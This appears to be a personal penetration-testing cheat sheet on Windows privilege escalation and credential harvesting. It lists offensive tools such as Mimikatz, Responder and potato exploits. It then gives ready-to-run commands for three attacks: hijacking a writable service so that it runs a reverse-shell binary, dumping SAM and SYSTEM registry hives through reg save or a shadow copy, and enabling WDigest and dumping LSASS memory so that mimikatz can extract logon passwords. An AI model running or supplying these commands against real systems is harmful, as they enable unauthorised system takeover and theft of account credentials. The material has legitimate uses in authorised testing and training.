Skip to content

Privilege Escalation

LOLBAS

Privilege Escalation

  • WinPEAS
  • LinPEAS
  • windows exploit suggester
  • sweet potato, juicy potato, lonely potato, hot potato
  • BloodHound

Credential Harvesting

  • Responder
  • Inveigh
  • Mimikatz
  • ntdsutil
  • secretsdump
  • Impacket

Service Exploits

Insecure Service Permissions

  1. Find a writable service.

    • accesschk.exe

      # accesschk.exe
      #   [
      #       [-d]        (only process directories or top level key)
      #       -k          (name is a Registry key)
      #       -p [-f]     (name is a process name or PID)
      #                   (show full process token information)
      #       -c          (name is a Windows Service)
      #       -o [-t <object type>]
      #                   (name is an object in the Object Manager namespace)
      #   ]
      #   [-r]        (show read access only)
      #   [-w]        (show write access only)
      #   [<username>]
      #   { <file (default)> | <directory> | <registry key> | <process> | <service> | <object> }
      
      accesschk.exe /accepteula -uwcqv user *
      
      1. Overwrite the service config.

    • sc

      sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
      
  2. Start ther service.

    • sc

      sc start daclsvc
      
    • net

      net start daclsvc
      

Potato Attacks

PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | itm4n

Pass the Hash

Hash Source

SAM (registry)

only local account

  • Export

    • reg

      cmd> reg save HKLM\SAM .\sam.reg
      cmd> reg save HKLM\SYSTEM .\system.reg
      
    • vssadmin

      cmd> vssadmin create shadow
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .\sam.reg
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .\system.reg
      
  • Show

    sh> samdump2 system sam
    

LSASS (memory)

only logon account

  • Prerequisite

    cmd> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
    
  • Export

    cmd> procdump.exe -accepteula -ma lsass.exe lsass.dmp
    
  • Show

    • From dump file

      mimikatz> sekurlsa::minidump lsass.dmp
      mimikatz> sekurlsa::logonPasswords
      
    • Live

      mimikatz> privilege::debug
      mimikatz> sekurlsa::logonpasswords
      

DCSync

Pass the Ticket

ADCS (ECS1-16)